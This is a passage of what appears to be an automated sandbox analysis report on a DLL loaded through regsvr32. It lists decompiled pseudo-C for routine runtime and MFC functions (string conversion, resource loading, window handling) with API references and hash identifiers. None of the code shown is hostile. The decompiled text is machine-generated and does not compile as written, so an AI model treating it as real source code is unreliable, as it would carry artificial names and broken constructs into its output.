                                                                                                                					_t7 = WideCharToMultiByte(0, 0, _t20, _t6, 0, 0, 0, 0);
                                                                                                                					_v0 = _t7;
                                                                                                                					__imp__#150(0, _t7);
                                                                                                                					_t13 = _t7;
                                                                                                                					__eflags = _t13;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						E1000A035(_t13, _t15, WideCharToMultiByte, 0, __eflags);
                                                                                                                					}
                                                                                                                					WideCharToMultiByte(0, 0, _t20, _v16, _t13, _v8, 0, 0);
                                                                                                                					return _t13;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}



                                                                                                                APIs
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 10020BCA
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,0000000C,1003A10E,00000000,00000018,1003A454), ref: 10020BE2
                                                                                                                • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 10020BEA
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000,?,?,0000000C,1003A10E,00000000,00000018,1003A454), ref: 10020C09
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Byte$CharMultiStringWide$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3384502665-0
                                                                                                                • Opcode ID: 540ecca906062b1386f6dcc704f4736bdd490e4b4e745cc514e637d6b43f55ac
                                                                                                                • Instruction ID: bc6146377f226ddcd5a13c169ad88fc722b0135e4b7495619c3a979ed2f1c725
                                                                                                                • Opcode Fuzzy Hash: 540ecca906062b1386f6dcc704f4736bdd490e4b4e745cc514e637d6b43f55ac
                                                                                                                • Instruction Fuzzy Hash: 78F06272106378BFE7215B629C8CC9BBE9CFE8B2E47010619F54892110D6259810C6F0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 89%
                                                                                                                			E1005803B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				signed int _t15;
                                                                                                                				LONG* _t21;
                                                                                                                				long _t23;
                                                                                                                				void* _t31;
                                                                                                                				LONG* _t33;
                                                                                                                				void* _t34;
                                                                                                                				void* _t35;
                                                                                                                
                                                                                                                				_t35 = __eflags;
                                                                                                                				_t29 = __edx;
                                                                                                                				_t25 = __ebx;
                                                                                                                				_push(0xc);
                                                                                                                				_push(0x100b5ed0);
                                                                                                                				E100491EC(__ebx, __edi, __esi);
                                                                                                                				_t31 = E100516CA(__edx, __edi, _t35);
                                                                                                                				_t15 =  *0x100bab24; // 0xfffffffe
                                                                                                                				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                                                					E1004ED25(0xd);
                                                                                                                					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                                                					 *(_t34 - 0x1c) = _t33;
                                                                                                                					__eflags = _t33 -  *0x100baa28; // 0x29214a8
                                                                                                                					if(__eflags != 0) {
                                                                                                                						__eflags = _t33;
                                                                                                                						if(_t33 != 0) {
                                                                                                                							_t23 = InterlockedDecrement(_t33);
                                                                                                                							__eflags = _t23;
                                                                                                                							if(_t23 == 0) {
                                                                                                                								__eflags = _t33 - 0x100ba600;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									_push(_t33);
                                                                                                                									E100470E9(_t25, _t31, _t33, __eflags);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t21 =  *0x100baa28; // 0x29214a8
                                                                                                                						 *(_t31 + 0x68) = _t21;
                                                                                                                						_t33 =  *0x100baa28; // 0x29214a8
                                                                                                                						 *(_t34 - 0x1c) = _t33;
                                                                                                                						InterlockedIncrement(_t33);
                                                                                                                					}
                                                                                                                					 *(_t34 - 4) = 0xfffffffe;
                                                                                                                					E100580D6();
                                                                                                                				} else {
                                                                                                                					_t33 =  *(_t31 + 0x68);
                                                                                                                				}
                                                                                                                				if(_t33 == 0) {
                                                                                                                					E1004C299(_t25, _t29, _t31, 0x20);
                                                                                                                				}
                                                                                                                				return E10049231(_t33);
                                                                                                                			}











                                                                                                                APIs
                                                                                                                  • Part of subcall function 100516CA: __getptd_noexit.LIBCMT ref: 100516CB
                                                                                                                  • Part of subcall function 100516CA: __amsg_exit.LIBCMT ref: 100516D8
                                                                                                                • __amsg_exit.LIBCMT ref: 10058067
                                                                                                                • __lock.LIBCMT ref: 10058077
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 10058094
                                                                                                                • InterlockedIncrement.KERNEL32(029214A8), ref: 100580BF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2880340415-0
                                                                                                                • Opcode ID: d750480f2ed67ca9fda060e2d8013d0ebf7c7263f22f59e314d0f65cb8b0c4a1
                                                                                                                • Instruction ID: 2c66c78485f96dee5787b1674e8c8abefd5a4d64d588bf85caaf56f3e5aa2c90
                                                                                                                • Opcode Fuzzy Hash: d750480f2ed67ca9fda060e2d8013d0ebf7c7263f22f59e314d0f65cb8b0c4a1
                                                                                                                • Instruction Fuzzy Hash: 0B01ED39D00721ABEB90DB648845B9D73E0FB09761F200115EC00B32D0C734BE9ACBD2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • SysStringLen.OLEAUT32(?), ref: 1004079C
                                                                                                                • SysStringByteLen.OLEAUT32(?), ref: 100407C0
                                                                                                                • SysStringByteLen.OLEAUT32(?), ref: 100407C7
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 100407E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Byte$Free
                                                                                                                • String ID:
                                                                                                                • API String ID: 103498640-0
                                                                                                                • Opcode ID: 85b4450f0673325f1efc7afb0754e52e6b19ddb51d71fbb30c35447615560f90
                                                                                                                • Instruction ID: fbd26468a5088b80c8e1d66cb20216ddacdf45072072ccf4a8a1e50c8cc5e636
                                                                                                                • Opcode Fuzzy Hash: 85b4450f0673325f1efc7afb0754e52e6b19ddb51d71fbb30c35447615560f90
                                                                                                                • Instruction Fuzzy Hash: A3F06D75A05119BBDF119F65CD89C8FBEB9EF452D472100B9F405E2110EA71EE10DA94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 92%
                                                                                                                			E10009A9F(void* __ebx, void* __ecx, void* __edi, struct tagPOINT _a8, signed int _a12) {
                                                                                                                				void* __ebp;
                                                                                                                				int _t18;
                                                                                                                				signed int _t23;
                                                                                                                				void* _t36;
                                                                                                                				void* _t37;
                                                                                                                				void* _t38;
                                                                                                                
                                                                                                                				_t36 = __edi;
                                                                                                                				_t32 = __ecx;
                                                                                                                				_t31 = __ebx;
                                                                                                                				_push(_a12);
                                                                                                                				_t37 = __ecx;
                                                                                                                				_t18 = PtInRect(__ecx + 0x60, _a8.x);
                                                                                                                				_t39 = _t18;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					L10001262(_t37,  &_a8, _a8.x, _a12);
                                                                                                                					_t34 =  *((intOrPtr*)(_t37 + 0x58));
                                                                                                                					_t23 = _a12 * 0x18 + _a8;
                                                                                                                					__eflags = _t23;
                                                                                                                					 *((intOrPtr*)(_t37 + 0x5c)) =  *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x58)) + _t23 * 4));
                                                                                                                					SendMessageA( *(E10013FEA(__ebx, _t34, _t38, GetParent( *(_t37 + 0x20))) + 0x20), 0x401, 1, 0);
                                                                                                                				} else {
                                                                                                                					 *(_t37 + 0x54) = 1;
                                                                                                                					E10013FEA(__ebx, _t32, _t38, SetCapture( *(_t37 + 0x20)));
                                                                                                                				}
                                                                                                                				return E10013F46(_t31, _t37, _t36, _t39);
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CaptureMessageParentRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2415874315-0
                                                                                                                • Opcode ID: 399e86d69f144f64d7a1cf1da985b58b00c05c7788515ef81abaed7b49b9f8e9
                                                                                                                • Instruction ID: 25e861961322638c5cc13c1cb93cfac8c952e232febe04a89418918ddb91ce9b
                                                                                                                • Opcode Fuzzy Hash: 399e86d69f144f64d7a1cf1da985b58b00c05c7788515ef81abaed7b49b9f8e9
                                                                                                                • Instruction Fuzzy Hash: 28017179604719EFEF109F60CC89E8A7BB9FF08714F008419F9468A661D776E520DF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100121B1(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
                                                                                                                				long _v12;
                                                                                                                				void _v16;
                                                                                                                				intOrPtr _t12;
                                                                                                                				long _t16;
                                                                                                                				void* _t21;
                                                                                                                				void* _t22;
                                                                                                                				void* _t23;
                                                                                                                
                                                                                                                				if(_a4 == 0 || _a16 == 0) {
                                                                                                                					L10:
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t12 = _a12;
                                                                                                                					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E10021BD1(_t21, _t22, _t23, _a8, _t12) == 0) {
                                                                                                                						goto L10;
                                                                                                                					} else {
                                                                                                                						GetObjectA(_a16, 0xc,  &_v16);
                                                                                                                						SetBkColor(_a4, _v12);
                                                                                                                						_t16 = _a20;
                                                                                                                						if(_t16 == 0xffffffff) {
                                                                                                                							_t16 = GetSysColor(8);
                                                                                                                						}
                                                                                                                						SetTextColor(_a4, _t16);
                                                                                                                						return 1;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • GetObjectA.GDI32(00000000,0000000C,?), ref: 100121EF
                                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 100121FB
                                                                                                                • GetSysColor.USER32 ref: 1001220B
                                                                                                                • SetTextColor.GDI32(00000000,?), ref: 10012215
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$ObjectText
                                                                                                                • String ID:
                                                                                                                • API String ID: 829078354-0
                                                                                                                • Opcode ID: 056738f1dbb01ff9727d5d93c506c385d49c7b0d9dd5cda1d16c97d0f571fc3e
                                                                                                                • Instruction ID: 67b1fd4cb3906346164cf3f103316e4a66c3f8fc6138dac16c0a882264e53a5f
                                                                                                                • Opcode Fuzzy Hash: 056738f1dbb01ff9727d5d93c506c385d49c7b0d9dd5cda1d16c97d0f571fc3e
                                                                                                                • Instruction Fuzzy Hash: 23014B70940109FBEF42DF64ED85AAE3AEAEB16380F504520FD02D81E0D776CAE0CA51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E100175A3(void* __ecx, CHAR* _a4) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				struct HRSRC__* _t8;
                                                                                                                				void* _t9;
                                                                                                                				void* _t11;
                                                                                                                				void* _t14;
                                                                                                                				void* _t15;
                                                                                                                				void* _t16;
                                                                                                                				struct HINSTANCE__* _t17;
                                                                                                                				void* _t18;
                                                                                                                
                                                                                                                				_t14 = 0;
                                                                                                                				_t11 = 0;
                                                                                                                				_t19 = _a4;
                                                                                                                				_t18 = __ecx;
                                                                                                                				if(_a4 == 0) {
                                                                                                                					L4:
                                                                                                                					_t16 = E1001715A(_t18, _t11);
                                                                                                                					if(_t11 != 0 && _t14 != 0) {
                                                                                                                						FreeResource(_t14);
                                                                                                                					}
                                                                                                                					return _t16;
                                                                                                                				}
                                                                                                                				_t17 =  *(E1001E302(0, 0, _t15, _t19) + 0xc);
                                                                                                                				_t8 = FindResourceA(_t17, _a4, 0xf0);
                                                                                                                				if(_t8 == 0) {
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				_t9 = LoadResource(_t17, _t8);
                                                                                                                				_t14 = _t9;
                                                                                                                				if(_t14 != 0) {
                                                                                                                					_t11 = LockResource(_t14);
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				return _t9;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 100175C5
                                                                                                                • LoadResource.KERNEL32(?,00000000,?,?,?,?,1001BAC6,?,?,1000853E,0BB35530), ref: 100175D1
                                                                                                                • LockResource.KERNEL32(00000000,?,?,?,?,1001BAC6,?,?,1000853E,0BB35530), ref: 100175DE
                                                                                                                • FreeResource.KERNEL32(00000000,?,?,?,?,1001BAC6,?,?,1000853E,0BB35530), ref: 100175F9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 3aaac21b0ef2c8b63035e737b3131aca2a8ee90a1bb553a8d0e70c6f11b13852
                                                                                                                • Instruction ID: 7948c032a4c72716df5e771d6e8d2f206c4fca0a3d528dd7194fd61f1b252fe8
                                                                                                                • Opcode Fuzzy Hash: 3aaac21b0ef2c8b63035e737b3131aca2a8ee90a1bb553a8d0e70c6f11b13852
                                                                                                                • Instruction Fuzzy Hash: 1AF0903A2006216FD3019B664C88A7BBABDFFC66E27050079FE08D7251DE75CD4186B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 73%
                                                                                                                			E1001C001(intOrPtr __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t9;
                                                                                                                				void* _t14;
                                                                                                                				void* _t18;
                                                                                                                				void* _t19;
                                                                                                                				void* _t20;
                                                                                                                				void* _t22;
                                                                                                                				struct HINSTANCE__* _t23;
                                                                                                                
                                                                                                                				_t18 = __edx;
                                                                                                                				_push(__ecx);
                                                                                                                				_push(_t22);
                                                                                                                				_push(_t19);
                                                                                                                				_v8 = __ecx;
                                                                                                                				_t14 = 0;
                                                                                                                				_t23 =  *(E1001E302(0, _t19, _t22, __eflags) + 0xc);
                                                                                                                				_t20 = LoadResource(_t23, FindResourceA(_t23, _a4, 5));
                                                                                                                				_t27 = _t20;
                                                                                                                				if(_t20 != 0) {
                                                                                                                					_t14 = LockResource(_t20);
                                                                                                                				}
                                                                                                                				_t9 = E1001BC23(_t14, _v8, _t18, _t20, _t23, _t27, _t14, _a8, _t23);
                                                                                                                				FreeResource(_t20);
                                                                                                                				return _t9;
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1001C01B
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1001C023
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1001C030
                                                                                                                • FreeResource.KERNEL32(00000000,00000000,?,?), ref: 1001C048
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 827473ef3e72b1209851eb1e6ca0238e8683fc6564f1af58fdf33cb5959af9ad
                                                                                                                • Instruction ID: 17b7ca83f3fe0b1c6abb568bf059af7570cb479962814bbe8024a2d76e27436e
                                                                                                                • Opcode Fuzzy Hash: 827473ef3e72b1209851eb1e6ca0238e8683fc6564f1af58fdf33cb5959af9ad
                                                                                                                • Instruction Fuzzy Hash: 0AF05E3A600624BFD7019BA98D8DDDFBBACEF5B6A17044095FA0597211DA79DE008BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 62%
                                                                                                                			E100259DA(short* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				int _t13;
                                                                                                                				void* _t15;
                                                                                                                				void* _t18;
                                                                                                                				void* _t23;
                                                                                                                				intOrPtr _t25;
                                                                                                                				short* _t27;
                                                                                                                				void* _t28;
                                                                                                                
                                                                                                                				_t23 = __edx;
                                                                                                                				_t19 = __ecx;
                                                                                                                				_t13 = E1004764D(0x1008f9c8, _t18, __edi, __esi);
                                                                                                                				_t27 = __ecx;
                                                                                                                				__imp__#9(__ecx, 0x224);
                                                                                                                				_t25 =  *((intOrPtr*)(_t28 + 8));
                                                                                                                				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
                                                                                                                				 *__ecx = 8;
                                                                                                                				if(_t25 != 0) {
                                                                                                                					_push(_t25);
                                                                                                                					if( *((short*)(_t28 + 0xc)) != 0xe) {
                                                                                                                						L4:
                                                                                                                						_t15 = E10025809(_t18, _t28 - 0x230, _t25, _t27, _t32);
                                                                                                                						_t7 = _t28 - 4;
                                                                                                                						 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                                                                                                                						_t9 = _t15 + 0xc; // 0xc
                                                                                                                						 *(_t27 + 8) = E10024C7E(_t18, _t9, _t23, _t25, _t27);
                                                                                                                						_t13 = E10025299(_t18, _t28 - 0x230,  *_t7);
                                                                                                                					} else {
                                                                                                                						_t13 = lstrlenA();
                                                                                                                						__imp__#150(_t25, _t13);
                                                                                                                						_t32 = _t13;
                                                                                                                						 *(_t27 + 8) = _t13;
                                                                                                                						if(_t13 == 0) {
                                                                                                                							E1000A035(_t18, _t19, _t25, _t27, _t32);
                                                                                                                							goto L4;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E10047725(_t13);
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 100259E4
                                                                                                                • VariantClear.OLEAUT32 ref: 100259EC
                                                                                                                • lstrlenA.KERNEL32(?,?,?,?,00000224), ref: 10025A0A
                                                                                                                • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 10025A12
                                                                                                                  • Part of subcall function 1000A035: __CxxThrowException@8.LIBCMT ref: 1000A049
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocByteClearException@8H_prolog3StringThrowVariantlstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 103272278-0
                                                                                                                • Opcode ID: a03163d6efae831f1220c955f7c88dcc41e9ab63c78cc7d2f5363c402911c247
                                                                                                                • Instruction ID: a60bc55f71c44e27e2e3c2ff32b84eedb9fa8c598236bbb949332012621262c7
                                                                                                                • Opcode Fuzzy Hash: a03163d6efae831f1220c955f7c88dcc41e9ab63c78cc7d2f5363c402911c247
                                                                                                                • Instruction Fuzzy Hash: 56F0C2358102009FE710EFA0D88A79DB3F4FF51352F61844CF44696161EFB8AA84CB16
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001BF72() {
                                                                                                                				intOrPtr _t16;
                                                                                                                				struct HWND__* _t19;
                                                                                                                				intOrPtr _t23;
                                                                                                                				intOrPtr* _t28;
                                                                                                                				void* _t29;
                                                                                                                
                                                                                                                				_t28 =  *((intOrPtr*)(_t29 - 0x20));
                                                                                                                				_t23 =  *((intOrPtr*)(_t29 - 0x24));
                                                                                                                				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
                                                                                                                					E10017979(_t23, 1);
                                                                                                                				}
                                                                                                                				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
                                                                                                                					EnableWindow( *(_t29 - 0x14), 1);
                                                                                                                				}
                                                                                                                				if( *(_t29 - 0x14) != 0) {
                                                                                                                					_t19 = GetActiveWindow();
                                                                                                                					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
                                                                                                                					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
                                                                                                                						SetActiveWindow( *(_t29 - 0x14));
                                                                                                                					}
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)( *_t28 + 0x60))();
                                                                                                                				E1001B96C(_t23, _t28, 0, _t28, _t34);
                                                                                                                				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
                                                                                                                					FreeResource( *(_t29 - 0x18));
                                                                                                                				}
                                                                                                                				_t16 =  *((intOrPtr*)(_t28 + 0x44));
                                                                                                                				return E10047725(_t16);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1001BF92
                                                                                                                • GetActiveWindow.USER32 ref: 1001BF9D
                                                                                                                • SetActiveWindow.USER32(?), ref: 1001BFAB
                                                                                                                • FreeResource.KERNEL32(?,?,00000024,10002FE0,0000035C), ref: 1001BFC7
                                                                                                                  • Part of subcall function 10017979: EnableWindow.USER32(?,?), ref: 10017986
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ActiveEnable$FreeResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 253586258-0
                                                                                                                • Opcode ID: f401b38f590cd6103beac2c03769a77f2c2e0e13847f51a37e67072dcf924825
                                                                                                                • Instruction ID: 2dfd2c675befebd13602439ac80d080b0f4b14b99b8caaf01a23d8a7659fb49f
                                                                                                                • Opcode Fuzzy Hash: f401b38f590cd6103beac2c03769a77f2c2e0e13847f51a37e67072dcf924825
                                                                                                                • Instruction Fuzzy Hash: 78F0FF34900A14CBDF11DB64CD8559DB7F1FF48742F600569E542761A1D732AD81CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10044171(void* __ebx, void* __ecx, void* __eflags) {
                                                                                                                				signed int _t8;
                                                                                                                				int _t9;
                                                                                                                				void* _t12;
                                                                                                                				void* _t13;
                                                                                                                				signed int* _t14;
                                                                                                                				void* _t15;
                                                                                                                
                                                                                                                				_t11 = __ecx;
                                                                                                                				_t13 = __ecx;
                                                                                                                				E10043DEE(__ecx, __eflags, 1);
                                                                                                                				ReleaseCapture();
                                                                                                                				_t12 = E10013FEA(__ebx, _t11, _t15, GetDesktopWindow());
                                                                                                                				LockWindowUpdate(0);
                                                                                                                				_t14 = _t13 + 0x84;
                                                                                                                				_t8 =  *_t14;
                                                                                                                				if(_t8 != 0) {
                                                                                                                					_t9 = ReleaseDC( *(_t12 + 0x20),  *(_t8 + 4));
                                                                                                                					 *_t14 =  *_t14 & 0x00000000;
                                                                                                                					return _t9;
                                                                                                                				}
                                                                                                                				return _t8;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                  • Part of subcall function 10043DEE: GetStockObject.GDI32(00000000), ref: 10043E04
                                                                                                                  • Part of subcall function 10043DEE: InflateRect.USER32 ref: 10043E9D
                                                                                                                • ReleaseCapture.USER32 ref: 1004417C
                                                                                                                • GetDesktopWindow.USER32 ref: 10044182
                                                                                                                • LockWindowUpdate.USER32(00000000), ref: 10044192
                                                                                                                • ReleaseDC.USER32(?,?), ref: 100441AA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1260764132-0
                                                                                                                • Opcode ID: 487d8e1f1d22c55ea9116bb0c082156a6a80de7b46ba3d7d2777d51c7725f6e5
                                                                                                                • Instruction ID: 30137e4151670ee796189177492b211ccbe665d0b2e8e252d8abed00b3cce6c8
                                                                                                                • Opcode Fuzzy Hash: 487d8e1f1d22c55ea9116bb0c082156a6a80de7b46ba3d7d2777d51c7725f6e5
                                                                                                                • Instruction Fuzzy Hash: D2E04F36900221ABEB206B75DD4DF857BA4FF41352F164474F545CB0B1CE76D8A0CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
